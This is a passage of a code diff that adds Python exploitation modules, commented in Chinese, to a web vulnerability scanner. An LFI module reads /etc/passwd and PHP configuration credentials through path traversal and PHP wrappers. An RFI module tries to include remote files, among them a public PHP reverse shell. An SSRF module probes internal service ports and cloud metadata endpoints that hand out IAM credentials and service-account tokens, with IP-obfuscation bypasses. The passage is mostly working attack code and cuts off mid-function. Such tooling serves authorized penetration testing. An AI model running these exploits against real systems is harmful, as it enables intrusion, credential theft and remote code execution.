+                parsed_url.fragment
+            ))
+            
+            # 发送请求
+            response = self.http_client.get(new_url)
+            
+            # 检查响应是否包含Base64编码内容
+            if response and response.status_code == 200:
+                # 检查是否包含Base64编码的内容
+                base64_content = self._extract_base64_content(response.text)
+                if base64_content:
+                    try:
+                        decoded_content = base64.b64decode(base64_content).decode('utf-8', errors='ignore')
+                        logger.info(f"成功使用包装器读取文件: {file_path}")
+                        return {
+                            'success': True,
+                            'message': f'成功利用LFI漏洞使用PHP包装器读取文件: {file_path}',
+                            'data': {
+                                'file_path': file_path,
+                                'wrapper': wrapper,
+                                'file_content': decoded_content[:1000] + ('...' if len(decoded_content) > 1000 else ''),
+                                'full_content_length': len(decoded_content)
+                            },
+                            'poc': new_url
+                        }
+                    except Exception as e:
+                        logger.error(f"Base64解码失败: {str(e)}")
+                        
+        except Exception as e:
+            logger.error(f"尝试使用包装器访问文件时出错: {str(e)}")
+            
+        return None
+        
+    def _try_traversal_access(self, url, parameter, traversal_path, file_path):
+        """
+        尝试使用目录遍历访问文件
+        
+        Args:
+            url: 目标URL
+            parameter: 参数名
+            traversal_path: 目录遍历路径
+            file_path: 文件路径
+            
+        Returns:
+            dict: 利用结果
+        """
+        try:
+            # 处理绝对路径，只保留文件名
+            if file_path.startswith('/'):
+                file_name = file_path.split('/')[-1]
+            elif file_path.startswith('C:\\') or file_path.startswith('C:/'):
+                file_name = file_path.replace('\\', '/').split('/')[-1]
+            else:
+                file_name = file_path
+                
+            payload = traversal_path + file_name
+            logger.info(f"尝试使用目录遍历访问文件: {payload}")
+            
+            # 构建注入URL
+            parsed_url = urllib.parse.urlparse(url)
+            query_params = dict(urllib.parse.parse_qsl(parsed_url.query))
+            query_params[parameter] = payload
+            
+            # 重建查询字符串
+            new_query = urllib.parse.urlencode(query_params)
+            new_url = urllib.parse.urlunparse((
+                parsed_url.scheme,
+                parsed_url.netloc,
+                parsed_url.path,
+                parsed_url.params,
+                new_query,
+                parsed_url.fragment
+            ))
+            
+            # 发送请求
+            response = self.http_client.get(new_url)
+            
+            # 检查响应是否含有敏感文件内容
+            if response and response.status_code == 200:
+                file_content = self._extract_file_content(response.text, file_path)
+                if file_content:
+                    logger.info(f"成功使用目录遍历读取文件: {file_path}")
+                    return {
+                        'success': True,
+                        'message': f'成功利用LFI漏洞使用目录遍历读取文件: {file_path}',
+                        'data': {
+                            'file_path': file_path,
+                            'traversal_pattern': traversal_path,
+                            'file_content': file_content[:1000] + ('...' if len(file_content) > 1000 else ''),
+                            'full_content_length': len(file_content)
+                        },
+                        'poc': new_url
+                    }
+                    
+        except Exception as e:
+            logger.error(f"尝试使用目录遍历访问文件时出错: {str(e)}")
+            
+        return None
+        
+    def _extract_file_content(self, response_text, file_path):
+        """
+        从响应中提取文件内容
+        
+        Args:
+            response_text: 响应文本
+            file_path: 尝试访问的文件路径
+            
+        Returns:
+            str: 提取的文件内容，如果未找到返回None
+        """
+        # 根据文件类型识别特征
+        if '/etc/passwd' in file_path:
+            # 查找/etc/passwd文件特征
+            if re.search(r"root:.*:0:0:", response_text):
+                # 提取完整的passwd文件内容
+                passwd_lines = re.findall(r"([a-z_][a-z0-9_-]*:[^:]*:[0-9]*:[0-9]*:[^:]*:[^:]*:[^\n]*)", response_text)
+                if passwd_lines:
+                    return "\n".join(passwd_lines)
+                    
+        elif '/etc/hosts' in file_path:
+            # 查找/etc/hosts文件特征
+            if re.search(r"127\.0\.0\.1\s+localhost", response_text):
+                # 提取完整的hosts文件内容
+                hosts_content = re.search(r"(127\.0\.0\.1\s+localhost.*?)(</|\n\n|$)", response_text, re.DOTALL)
+                if hosts_content:
+                    return hosts_content.group(1)
+                    
+        elif 'win.ini' in file_path.lower():
+            # 查找win.ini文件特征
+            if re.search(r"\[fonts\]|\[extensions\]", response_text, re.IGNORECASE):
+                # 提取完整的win.ini文件内容
+                win_ini_content = re.search(r"(\[fonts\].*?)(</|\n\n|$)", response_text, re.DOTALL | re.IGNORECASE)
+                if win_ini_content:
+                    return win_ini_content.group(1)
+                    
+        elif 'httpd.conf' in file_path or 'apache' in file_path:
+            # 查找Apache配置文件特征
+            if re.search(r"<VirtualHost|ServerName|DocumentRoot", response_text):
+                # 提取配置文件片段
+                apache_content = re.search(r"(ServerName.*?|<VirtualHost.*?|DocumentRoot.*?)(</|\n\n|$)", response_text, re.DOTALL)
+                if apache_content:
+                    return apache_content.group(1)
+                    
+        elif 'nginx.conf' in file_path:
+            # 查找Nginx配置文件特征
+            if re.search(r"server\s*{|http\s*{|location\s*", response_text):
+                # 提取配置文件片段
+                nginx_content = re.search(r"(server\s*{.*?|http\s*{.*?)(</|\n\n|$)", response_text, re.DOTALL)
+                if nginx_content:
+                    return nginx_content.group(1)
+                    
+        elif '.php' in file_path:
+            # 查找PHP文件特征
+            if re.search(r"<\?php|DB_|PASSWORD|HOST|USER", response_text, re.IGNORECASE):
+                # 提取PHP代码片段
+                php_content = re.search(r"(<\?php.*?\?>|define\s*\(\s*['\"](DB_|HOST|USER|PASSWORD).*?;)", response_text, re.DOTALL | re.IGNORECASE)
+                if php_content:
+                    return php_content.group(1)
+                    
+        elif '.log' in file_path:
+            # 查找日志文件特征
+            if re.search(r"\[\d{2}/\w{3}/\d{4}.*?\]|\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}", response_text):
+                # 提取日志条目
+                log_entries = re.findall(r"(\[\d{2}/\w{3}/\d{4}.*?\].*?)\n", response_text)
+                if log_entries:
+                    return "\n".join(log_entries[:20]) + ("\n..." if len(log_entries) > 20 else "")
+                    
+        # 通用文件内容检测
+        # 尝试根据文件类型的常见特征来判断是否成功读取到文件内容
+        file_extension = file_path.split('.')[-1].lower() if '.' in file_path else ''
+        
+        if file_extension in ['txt', 'ini', 'conf', 'config', 'json', 'xml', 'yaml', 'yml']:
+            # 检查是否包含文件结构特征
+            if re.search(r"[\{\}\[\]=:\\><\n]", response_text) and len(response_text) > 20:
+                # 返回前1000个字符作为文件内容
+                return response_text[:1000]
+                
+        # 如果无法确定具体文件类型，但响应不是HTML格式，可能是成功的
+        if not re.search(r"<!DOCTYPE html>|<html|<body|<head", response_text, re.IGNORECASE) and len(response_text) > 20:
+            # 返回前1000个字符作为文件内容
+            return response_text[:1000]
+            
+        return None
+        
+    def _extract_base64_content(self, response_text):
+        """
+        从响应中提取Base64编码内容
+        
+        Args:
+            response_text: 响应文本
+            
+        Returns:
+            str: 提取的Base64内容，如果未找到返回None
+        """
+        # 查找可能的Base64编码字符串
+        base64_pattern = r"([A-Za-z0-9+/]{20,}={0,2})"
+        matches = re.findall(base64_pattern, response_text)
+        
+        # 检查每个匹配项是否是有效的Base64编码
+        for match in matches:
+            try:
+                # 尝试解码
+                decoded = base64.b64decode(match).decode('utf-8', errors='ignore')
+                
+                # 检查解码后的内容是否包含敏感信息
+                if (re.search(r"<\?php|root:|DOCTYPE|html|password=", decoded, re.IGNORECASE) and 
+                    len(decoded) > 20):
+                    return match
+                    
+            except Exception:
+                continue
+                
+        return None 
\ No newline at end of file
diff --git a/xss_scanner/exploits/rfi_exploit.py b/xss_scanner/exploits/rfi_exploit.py
new file mode 100644
index 0000000..9ae85c6
--- /dev/null
+++ b/xss_scanner/exploits/rfi_exploit.py
@@ -0,0 +1,267 @@
+#!/usr/bin/env python
+# -*- coding: utf-8 -*-
+
+"""
+RFI（远程文件包含）漏洞利用模块
+"""
+
+import logging
+import re
+import urllib.parse
+import random
+import string
+import base64
+import requests
+
+logger = logging.getLogger('xss_scanner')
+
+class RFIExploit:
+    """RFI漏洞利用类"""
+    
+    def __init__(self, http_client):
+        """
+        初始化RFI漏洞利用模块
+        
+        Args:
+            http_client: HTTP客户端对象
+        """
+        self.http_client = http_client
+        
+        # 远程测试文件URL列表
+        self.remote_test_files = [
+            "http://www.google.com/humans.txt",
+            "https://www.bing.com/robots.txt",
+            "https://raw.githubusercontent.com/danielmiessler/SecLists/master/Discovery/Web-Content/phpinfo.php",
+            "https://raw.githubusercontent.com/tennc/webshell/master/php/php-reverse-shell.php"
+        ]
+        
+        # RFI测试代码片段
+        self.test_code_snippets = [
+            "<?php echo 'RFI_TEST_'.rand(1000,9999); ?>",
+            "<?php echo md5('RFI_TEST'); ?>",
+            "<?php echo base64_encode('RFI_TEST_'.time()); ?>",
+            "<?php phpinfo(); ?>"
+        ]
+        
+        # 远程测试代码的可能托管服务
+        self.remote_code_hosts = [
+            "https://pastebin.com/raw/",
+            "https://gist.githubusercontent.com/raw/",
+            "https://raw.githubusercontent.com/"
+        ]
+        
+        # 常见参数名
+        self.common_parameters = [
+            "file", 
+            "page", 
+            "url", 
+            "uri", 
+            "path", 
+            "filepath", 
+            "load", 
+            "include", 
+            "require", 
+            "doc",
+            "document", 
+            "folder", 
+            "root", 
+            "cont", 
+            "content", 
+            "layout",
+            "mod", 
+            "module", 
+            "template"
+        ]
+        
+    def exploit(self, vulnerability):
+        """
+        利用RFI漏洞
+        
+        Args:
+            vulnerability: 漏洞信息
+            
+        Returns:
+            dict: 利用结果
+        """
+        logger.info(f"尝试利用RFI漏洞: {vulnerability['url']}")
+        
+        url = vulnerability.get('url')
+        parameter = vulnerability.get('parameter')
+        payload = vulnerability.get('payload', '')
+        
+        if not url or not parameter:
+            return {
+                'success': False,
+                'message': '缺少必要的漏洞信息(URL或参数名)',
+                'data': None
+            }
+            
+        # 尝试远程文件测试
+        for remote_url in self.remote_test_files:
+            result = self._try_remote_file(url, parameter, remote_url)
+            if result and result['success']:
+                return result
+                
+        # 生成随机标记用于验证
+        verification_mark = ''.join(random.choice(string.ascii_letters + string.digits) for _ in range(8))
+        logger.info(f"生成验证标记: {verification_mark}")
+        
+        # 如果远程文件测试不成功，尝试创建一个自定义的远程测试文件
+        # 实际应用中，需要一个可控的Web服务器来托管这些文件
+        # 这里只是演示性代码
+        test_code = f"<?php echo 'RFI_VERIFICATION_{verification_mark}'; ?>"
+        
+        # 返回结果
+        # 注意：实际利用需要真实的远程服务器来托管恶意代码
+        return {
+            'success': False,
+            'message': '在实际环境中，需要一个可控的远程Web服务器托管PHP代码来完成RFI漏洞利用',
+            'data': {
+                'verification_code': test_code,
+                'parameter': parameter,
+                'url': url
+            },
+            'poc': f"要验证RFI漏洞，请在你控制的Web服务器托管包含 '{test_code}' 的PHP文件，然后设置URL参数 {parameter}={{'你的PHP文件URL'}}",
+            'manual_steps': [
+                "1. 在你控制的Web服务器上创建一个PHP文件，内容为: " + test_code,
+                "2. 确保该PHP文件可通过HTTP/HTTPS访问",
+                f"3. 构造URL: {url}?{parameter}=http://your-server.com/your-file.php",
+                f"4. 如果响应中包含 'RFI_VERIFICATION_{verification_mark}'，则确认存在RFI漏洞"
+            ]
+        }
+        
+    def _try_remote_file(self, url, parameter, remote_url):
+        """
+        尝试包含远程文件
+        
+        Args:
+            url: 目标URL
+            parameter: 参数名
+            remote_url: 远程文件URL
+            
+        Returns:
+            dict: 利用结果
+        """
+        try:
+            logger.info(f"尝试包含远程文件: {remote_url}")
+            
+            # 构建RFI测试URL
+            parsed_url = urllib.parse.urlparse(url)
+            query_params = dict(urllib.parse.parse_qsl(parsed_url.query))
+            query_params[parameter] = remote_url
+            
+            # 重建查询字符串
+            new_query = urllib.parse.urlencode(query_params)
+            new_url = urllib.parse.urlunparse((
+                parsed_url.scheme,
+                parsed_url.netloc,
+                parsed_url.path,
+                parsed_url.params,
+                new_query,
+                parsed_url.fragment
+            ))
+            
+            # 先获取远程文件内容，以便后续比较
+            try:
+                remote_response = requests.get(remote_url, timeout=5)
+                if not remote_response.ok:
+                    logger.warning(f"无法获取远程文件内容: {remote_url}")
+                    return None
+                    
+                remote_content = remote_response.text
+                logger.info(f"成功获取远程文件内容，长度: {len(remote_content)} 字节")
+                
+                # 获取远程文件的特征以便检测
+                # 提取特征，最多50个字符
+                feature_length = min(50, len(remote_content))
+                if feature_length > 0:
+                    remote_feature = remote_content[:feature_length]
+                else:
+                    logger.warning("远程文件内容为空")
+                    return None
+                    
+            except Exception as e:
+                logger.error(f"获取远程文件内容时出错: {str(e)}")
+                return None
+                
+            # 发送包含请求
+            response = self.http_client.get(new_url)
+            
+            # 检查响应是否包含远程文件内容
+            if response and response.status_code == 200:
+                # 检查响应中是否包含远程文件的特征
+                if remote_feature and remote_feature in response.text:
+                    logger.info(f"成功包含远程文件，发现特征: {remote_feature[:20]}...")
+                    return {
+                        'success': True,
+                        'message': f'成功利用RFI漏洞包含远程文件: {remote_url}',
+                        'data': {
+                            'remote_url': remote_url,
+                            'parameter': parameter,
+                            'feature_found': remote_feature[:20] + ('...' if len(remote_feature) > 20 else '')
+                        },
+                        'poc': new_url
+                    }
+                elif "phpinfo" in remote_url.lower() and "PHP Version" in response.text and "PHP License" in response.text:
+                    # 特殊检测: phpinfo()
+                    logger.info("成功包含远程PHP文件，执行了phpinfo()")
+                    return {
+                        'success': True,
+                        'message': '成功利用RFI漏洞包含远程PHP文件并执行了phpinfo()',
+                        'data': {
+                            'remote_url': remote_url,
+                            'parameter': parameter,
+                            'php_version': self._extract_php_version(response.text)
+                        },
+                        'poc': new_url
+                    }
+                elif "shell" in remote_url.lower() and "system" in response.text and "exec" in response.text:
+                    # 特殊检测: 可能的webshell
+                    logger.info("成功包含远程PHP文件，可能是webshell")
+                    return {
+                        'success': True,
+                        'message': '成功利用RFI漏洞包含远程PHP文件(可能是webshell)',
+                        'data': {
+                            'remote_url': remote_url,
+                            'parameter': parameter,
+                            'warning': '检测到可能包含危险函数的代码'
+                        },
+                        'poc': new_url
+                    }
+                    
+        except Exception as e:
+            logger.error(f"尝试包含远程文件时出错: {str(e)}")
+            
+        return None
+        
+    def _extract_php_version(self, phpinfo_output):
+        """
+        从phpinfo()输出中提取PHP版本
+        
+        Args:
+            phpinfo_output: phpinfo()函数的输出
+            
+        Returns:
+            str: PHP版本
+        """
+        # 尝试提取PHP版本
+        version_match = re.search(r"PHP Version[\s]*[=>]*[\s]*([0-9.]+)", phpinfo_output)
+        if version_match:
+            return version_match.group(1)
+        return "未知"
+        
+    def _create_remote_test_file(self, test_code):
+        """
+        创建远程测试文件
+        
+        Args:
+            test_code: 测试代码
+            
+        Returns:
+            str: 远程文件URL
+        """
+        # 在实际应用中，这个函数应该将测试代码上传到可控的Web服务器
+        # 并返回可访问的URL
+        # 这里仅作为演示，返回一个假的URL
+        logger.warning("创建远程测试文件功能需要实际的Web服务器支持")
+        return "http://example.com/test_rfi.php" 
\ No newline at end of file
diff --git a/xss_scanner/exploits/sqli_exploit.py b/xss_scanner/exploits/sqli_exploit.py
new file mode 100644
index 0000000..4422b26
--- /dev/null
+++ b/xss_scanner/exploits/sqli_exploit.py
@@ -0,0 +1,60 @@
+#!/usr/bin/env python
+# -*- coding: utf-8 -*-
+
+"""
+SQL注入漏洞利用模块
+"""
+
+import logging
+import re
+import urllib.parse
+
+logger = logging.getLogger('xss_scanner')
+
+class SQLInjectionExploit:
+    """SQL注入漏洞利用类"""
+    
+    def __init__(self, http_client):
+        """
+        初始化SQL注入漏洞利用模块
+        
+        Args:
+            http_client: HTTP客户端对象
+        """
+        self.http_client = http_client
+        self.current_dbms = None  # 数据库类型
+        
+    def exploit(self, vulnerability):
+        """
+        利用SQL注入漏洞
+        
+        Args:
+            vulnerability: 漏洞信息
+            
+        Returns:
+            dict: 利用结果
+        """
+        logger.info(f"尝试利用SQL注入漏洞: {vulnerability['url']}")
+        
+        url = vulnerability.get('url')
+        parameter = vulnerability.get('parameter')
+        payload = vulnerability.get('payload', '')
+        
+        if not url or not parameter:
+            return {
+                'success': False,
+                'message': '缺少必要的漏洞信息(URL或参数名)',
+                'data': None
+            }
+        
+        # 简化版实现 - 返回基本信息
+        return {
+            'success': True,
+            'message': '成功生成SQL注入利用PoC',
+            'data': {
+                'url': url,
+                'parameter': parameter,
+                'payload': payload
+            },
+            'poc': f"{url}?{parameter}={urllib.parse.quote(payload)}"
+        } 
\ No newline at end of file
diff --git a/xss_scanner/exploits/ssrf_exploit.py b/xss_scanner/exploits/ssrf_exploit.py
new file mode 100644
index 0000000..962bb92
--- /dev/null
+++ b/xss_scanner/exploits/ssrf_exploit.py
@@ -0,0 +1,527 @@
+#!/usr/bin/env python
+# -*- coding: utf-8 -*-
+
+"""
+SSRF（服务器端请求伪造）漏洞利用模块
+"""
+
+import logging
+import re
+import urllib.parse
+import random
+import string
+import socket
+import json
+import ipaddress
+
+logger = logging.getLogger('xss_scanner')
+
+class SSRFExploit:
+    """SSRF漏洞利用类"""
+    
+    def __init__(self, http_client):
+        """
+        初始化SSRF漏洞利用模块
+        
+        Args:
+            http_client: HTTP客户端对象
+        """
+        self.http_client = http_client
+        
+        # 内部服务目标
+        self.internal_targets = [
+            "127.0.0.1",           # 本地主机
+            "localhost",           # 本地主机
+            "0.0.0.0",             # 任意地址
+            "10.0.0.0/8",          # 私有IP A类
+            "172.16.0.0/12",       # 私有IP B类
+            "192.168.0.0/16",      # 私有IP C类
+            "169.254.169.254",     # AWS元数据服务
+            "metadata.google.internal", # GCP元数据
+            "100.100.100.200",     # 阿里云元数据
+            "169.254.169.254",     # Azure元数据
+            "127.0.0.1:25",        # SMTP
+            "127.0.0.1:22",        # SSH
+            "127.0.0.1:1433",      # MS SQL
+            "127.0.0.1:3306",      # MySQL
+            "127.0.0.1:5432",      # PostgreSQL
+            "127.0.0.1:6379",      # Redis
+            "127.0.0.1:9200",      # Elasticsearch
+            "127.0.0.1:11211",     # Memcached
+            "127.0.0.1:27017",     # MongoDB
+            "127.0.0.1:8500",      # Consul
+            "127.0.0.1:2375",      # Docker API
+            "127.0.0.1:8080",      # 常见Web服务
+            "127.0.0.1:8000",      # 常见Web服务
+            "127.0.0.1:5000",      # 常见Web服务
+            "127.0.0.1:3000"       # 常见Web服务
+        ]
+        
+        # 内部服务路径
+        self.service_paths = {
+            "redis": ["/", ""],
+            "mysql": ["/", ""],
+            "elasticsearch": ["/", "/_cat/indices", "/_cluster/health"],
+            "mongodb": ["/", "/stats"],
+            "memcached": ["/", ""],
+            "docker": ["/", "/images/json", "/containers/json"],
+            "etcd": ["/", "/v2/keys", "/v2/members"],
+            "consul": ["/v1/catalog/services", "/v1/agent/self"],
+            "kubernetes": ["/api/v1/pods", "/api/v1/namespaces"]
+        }
+        
+        # 云服务商元数据URL
+        self.cloud_metadata_urls = {
+            "aws": [
+                "http://169.254.169.254/latest/meta-data/",
+                "http://169.254.169.254/latest/meta-data/local-hostname",
+                "http://169.254.169.254/latest/meta-data/public-hostname",
+                "http://169.254.169.254/latest/meta-data/local-ipv4",
+                "http://169.254.169.254/latest/meta-data/public-ipv4",
+                "http://169.254.169.254/latest/meta-data/iam/security-credentials/"
+            ],
+            "gcp": [
+                "http://metadata.google.internal/computeMetadata/v1/",
+                "http://metadata.google.internal/computeMetadata/v1/instance/hostname",
+                "http://metadata.google.internal/computeMetadata/v1/instance/id",
+                "http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token"
+            ],
+            "azure": [
+                "http://169.254.169.254/metadata/instance?api-version=2019-06-01",
+                "http://169.254.169.254/metadata/instance/compute?api-version=2019-06-01"
+            ],
+            "alibaba": [
+                "http://100.100.100.200/latest/meta-data/",
+                "http://100.100.100.200/latest/meta-data/instance-id",
+                "http://100.100.100.200/latest/meta-data/region-id"
+            ]
+        }
+        
+        # IP替代表示法
+        self.ip_alternative_forms = {
+            "127.0.0.1": [
+                "localhost",
+                "127.0.1",
+                "127.1",
+                "2130706433",           # 十进制表示
+                "0x7f000001",           # 十六进制表示
+                "0177.0.0.01",          # 八进制表示
+                "0177.0.0.1",
+                "0177.0.1",
+                "0177.1",
+                "::1",                  # IPv6表示
+                "::ffff:127.0.0.1",     # IPv6 映射
+                "[::1]",
+                "[::ffff:127.0.0.1]",
+                "1278.1.1.1"
+            ]
+        }
+        
+        # SSRF绕过技术
+        self.ssrf_bypasses = [
+            "@",                 # URL认证绕过（user:pass@host）
+            "#",                 # URL片段
+            "?",                 # URL查询参数
+            "%23",               # URL编码的#
+            "%3F",               # URL编码的?
+            "\r\n",              # CRLF注入
+            "%0D%0A",            # URL编码的CRLF
+            "/.",                # 目录遍历
+            "//"                 # 双斜杠
+        ]
+        
+        # 常见参数名
+        self.common_parameters = [
+            "url", 
+            "uri", 
+            "link", 
+            "src", 
+            "source", 
+            "redirect", 
+            "redirect_to", 
+            "image", 
+            "img", 
+            "file", 
+            "download", 
+            "upload", 
+            "domain", 
+            "host", 
+            "port", 
+            "callback", 
+            "return", 
+            "return_to", 
+            "next", 
+            "target", 
+            "feed", 
+            "fetch", 
+            "site", 
+            "html", 
+            "page", 
+            "data", 
+            "reference", 
+            "reference_url"
+        ]
+        
+    def exploit(self, vulnerability):
+        """
+        利用SSRF漏洞
+        
+        Args:
+            vulnerability: 漏洞信息
+            
+        Returns:
+            dict: 利用结果
+        """
+        logger.info(f"尝试利用SSRF漏洞: {vulnerability['url']}")
+        
+        url = vulnerability.get('url')
+        parameter = vulnerability.get('parameter')
+        payload = vulnerability.get('payload', '')
+        
+        if not url or not parameter:
+            return {
+                'success': False,
+                'message': '缺少必要的漏洞信息(URL或参数名)',
+                'data': None
+            }
+            
+        # 尝试探测内部服务
+        internal_services = []
+        successful_payloads = []
+        
+        # 生成随机标记用于OAST（带外应用安全测试）
+        verification_id = ''.join(random.choice(string.ascii_lowercase) for _ in range(8))
+        oast_domain = f"ssrf-{verification_id}.example.com"
+        oast_url = f"http://{oast_domain}/"
+        
+        logger.info(f"生成的OAST域名: {oast_domain}")
+        
+        # 0. 首先尝试OAST探测（如果有真实的回调服务器）
+        if hasattr(self, 'callback_server') and self.callback_server:
+            logger.info("尝试使用OAST检测SSRF漏洞")
+            result = self._try_oast_detection(url, parameter, oast_url)
+            if result and result['success']:
+                return result
+                
+        # 1. 尝试本地服务
+        logger.info("尝试探测本地服务")
+        for target in self.internal_targets[:5]:  # 只尝试前5个目标
+            # 基本请求
+            result = self._try_internal_service(url, parameter, f"http://{target}")
+            if result and result['success']:
+                internal_services.append(result['data']['target'])
+                successful_payloads.append(result['data']['payload'])
+                logger.info(f"发现可访问的内部服务: {target}")
+                
+            # 尝试一些端口，如果目标是IP地址
+            if re.match(r"^\d+\.\d+\.\d+\.\d+$", target):
+                for port in [80, 8080, 8000, 5000, 3000, 22, 6379]:
+                    result = self._try_internal_service(url, parameter, f"http://{target}:{port}")
+                    if result and result['success']:
+                        internal_services.append(f"{target}:{port}")
+                        successful_payloads.append(result['data']['payload'])
+                        logger.info(f"发现可访问的内部服务: {target}:{port}")
+                    
+        # 2. 尝试云服务商元数据
+        logger.info("尝试探测云服务商元数据")
+        cloud_metadata = {}
+        for provider, urls in self.cloud_metadata_urls.items():
+            for metadata_url in urls[:2]:  # 只尝试前2个URL
+                result = self._try_internal_service(url, parameter, metadata_url)
+                if result and result['success']:
+                    if provider not in cloud_metadata:
+                        cloud_metadata[provider] = []
+                    cloud_metadata[provider].append({
+                        'url': metadata_url,
+                        'response': result['data'].get('response', ''),
+                        'payload': result['data']['payload']
+                    })
+                    successful_payloads.append(result['data']['payload'])
+                    logger.info(f"发现可访问的云服务商元数据: {metadata_url}")
+        
+        # 3. 尝试一些IP替代表示法绕过手段（针对localhost）
+        logger.info("尝试使用IP替代表示法绕过")
+        for alt_ip in self.ip_alternative_forms["127.0.0.1"][:5]:  # 只尝试前5个替代表示
+            result = self._try_internal_service(url, parameter, f"http://{alt_ip}")
+            if result and result['success']:
+                internal_services.append(alt_ip)
+                successful_payloads.append(result['data']['payload'])
+                logger.info(f"通过IP替代表示法可访问本地服务: {alt_ip}")
+                
+        # 编译结果
+        if internal_services or cloud_metadata:
+            logger.info(f"SSRF利用成功，发现 {len(internal_services)} 个内部服务和 {len(cloud_metadata)} 个云服务商元数据")
+            
+            # 选择一个最可靠的有效载荷作为PoC
+            poc_payload = successful_payloads[0] if successful_payloads else payload
+            
+            # 构建 PoC URL
+            parsed_url = urllib.parse.urlparse(url)
+            query_params = dict(urllib.parse.parse_qsl(parsed_url.query))
+            query_params[parameter] = poc_payload
+            new_query = urllib.parse.urlencode(query_params)
+            poc_url = urllib.parse.urlunparse((
+                parsed_url.scheme,
+                parsed_url.netloc,
+                parsed_url.path,
+                parsed_url.params,
+                new_query,
+                parsed_url.fragment
+            ))
+            
+            return {
+                'success': True,
+                'message': 'SSRF漏洞利用成功',
+                'data': {
+                    'internal_services': internal_services,
+                    'cloud_metadata': cloud_metadata,
+                    'successful_payloads': successful_payloads
+                },
+                'poc': poc_url
+            }
+        else:
+            # 如果没有直接成功，返回手动验证步骤
+            logger.info("无法自动确认SSRF漏洞，提供手动验证步骤")
+            return {
+                'success': False,
+                'message': '未能自动确认SSRF漏洞，但可能存在，请尝试手动验证',
+                'data': {
+                    'parameter': parameter,
+                    'url': url,
+                    'oast_domain': oast_domain
+                },
+                'manual_steps': [
+                    "1. 设置一个你控制的外部Web服务器，记录所有接收到的请求",
+                    f"2. 构造URL: {url}?{parameter}=http://your-server.com/ssrf-test",
+                    "3. 如果你的服务器收到来自目标服务器的请求，则确认存在SSRF漏洞",
+                    "4. 尝试以下内部服务目标进行测试:",
+                    "   - http://localhost/",
+                    "   - http://127.0.0.1:8080/",
+                    "   - http://169.254.169.254/latest/meta-data/ (AWS元数据)",
+                    "5. 尝试以下绕过技术:",
+                    "   - http://0177.0.0.1/ (八进制IP)",
+                    "   - http://0x7f000001/ (十六进制IP)",
+                    "   - http://2130706433/ (整数IP)"
+                ]
+            }
+            
+    def _try_internal_service(self, url, parameter, target_url):
+        """
+        尝试通过SSRF访问内部服务
+        
+        Args:
+            url: 目标URL
+            parameter: 参数名
+            target_url: 要访问的内部服务URL
+            
+        Returns:
+            dict: 利用结果
+        """
+        try:
+            logger.info(f"尝试访问内部服务: {target_url}")
+            
+            # 构建SSRF测试URL
+            parsed_url = urllib.parse.urlparse(url)
+            query_params = dict(urllib.parse.parse_qsl(parsed_url.query))
+            query_params[parameter] = target_url
+            
+            # 重建查询字符串
+            new_query = urllib.parse.urlencode(query_params)
+            new_url = urllib.parse.urlunparse((
+                parsed_url.scheme,
+                parsed_url.netloc,
+                parsed_url.path,
+                parsed_url.params,
+                new_query,
+                parsed_url.fragment
+            ))
+            
+            # 发送请求
+            response = self.http_client.get(new_url)
+            
+            # 检查响应，查找SSRF成功的迹象
+            if response and response.status_code == 200:
+                response_text = response.text
+                
+                # 检查常见的SSRF成功迹象
+                success_indicators = self._get_service_indicators(target_url)
+                for indicator in success_indicators:
+                    if indicator in response_text:
+                        logger.info(f"内部服务访问成功，找到特征: {indicator}")
+                        return {
+                            'success': True,
+                            'message': f'成功利用SSRF漏洞访问内部服务: {target_url}',
+                            'data': {
+                                'target': target_url,
+                                'parameter': parameter,
+                                'payload': target_url,
+                                'indicator': indicator,
+                                'response': response_text[:200] + ('...' if len(response_text) > 200 else '')
+                            }
+                        }
+                        
+                # 如果没有找到明确的特征，检查是否有其他常见服务标识
+                if any(keyword in response_text.lower() for keyword in [
+                    'apache', 'nginx', 'iis', 'server', 'service', 'redis', 'mysql', 
+                    'postgresql', 'mongodb', 'memcached', 'elasticsearch', 'forbidden', 'unauthorized',
+                    '401', '403', 'authentication', 'password', 'login', 'admin', 'root', 'error',
+                    '<title>', '<html>', 'json', 'xml', 'internal'
+                ]):
+                    logger.info(f"内部服务可能可以访问，发现常见服务标识")
+                    return {
+                        'success': True,
+                        'message': f'可能成功利用SSRF漏洞访问内部服务: {target_url}',
+                        'data': {
+                            'target': target_url,
+                            'parameter': parameter,
+                            'payload': target_url,
+                            'response': response_text[:200] + ('...' if len(response_text) > 200 else '')
+                        }
+                    }
+                    
+                # 如果HTTP状态码不是404，可能成功了
+                if response.status_code not in [404, 400, 500]:
+                    logger.info(f"内部服务响应了非错误状态码: {response.status_code}")
+                    return {
+                        'success': True,
+                        'message': f'可能成功利用SSRF漏洞访问内部服务: {target_url}',
+                        'data': {
+                            'target': target_url,
+                            'parameter': parameter,
+                            'payload': target_url,
+                            'status_code': response.status_code,
+                            'response': response_text[:200] + ('...' if len(response_text) > 200 else '')
+                        }
+                    }
+                    
+        except Exception as e:
+            logger.error(f"尝试访问内部服务时出错: {str(e)}")
+            
+        return None
+        
+    def _try_oast_detection(self, url, parameter, callback_url):
+        """
+        尝试使用OAST（带外应用安全测试）检测SSRF
+        
+        Args:
+            url: 目标URL
+            parameter: 参数名
+            callback_url: 回调URL
+            
+        Returns:
+            dict: 利用结果
+        """
+        try:
+            logger.info(f"尝试OAST检测SSRF: {callback_url}")
+            
+            # 构建SSRF测试URL
+            parsed_url = urllib.parse.urlparse(url)
+            query_params = dict(urllib.parse.parse_qsl(parsed_url.query))
+            query_params[parameter] = callback_url
+            
+            # 重建查询字符串
+            new_query = urllib.parse.urlencode(query_params)
+            new_url = urllib.parse.urlunparse((
+                parsed_url.scheme,
+                parsed_url.netloc,
+                parsed_url.path,
+                parsed_url.params,
+                new_query,
+                parsed_url.fragment
+            ))
+            
+            # 发送请求
+            response = self.http_client.get(new_url)
+            
+            # 检查回调服务器是否收到请求（假设实现）
+            # 注意：这需要真实的回调服务器实现
+            if hasattr(self, 'check_callback') and self.check_callback(callback_url):
+                logger.info(f"检测到OAST回调，确认SSRF漏洞")
+                return {
+                    'success': True,
+                    'message': '通过OAST成功确认SSRF漏洞',
+                    'data': {
+                        'callback_url': callback_url,
+                        'parameter': parameter
+                    },
+                    'poc': new_url
+                }
+                
+        except Exception as e:
+            logger.error(f"尝试OAST检测时出错: {str(e)}")
+            
+        return None
+        
+    def _get_service_indicators(self, target_url):
+        """
+        获取目标服务的特征指标
+        
+        Args:
+            target_url: 目标服务URL
+            
+        Returns:
+            list: 特征指标列表
+        """
+        indicators = []
+        
+        # 提取主机和路径
+        try:
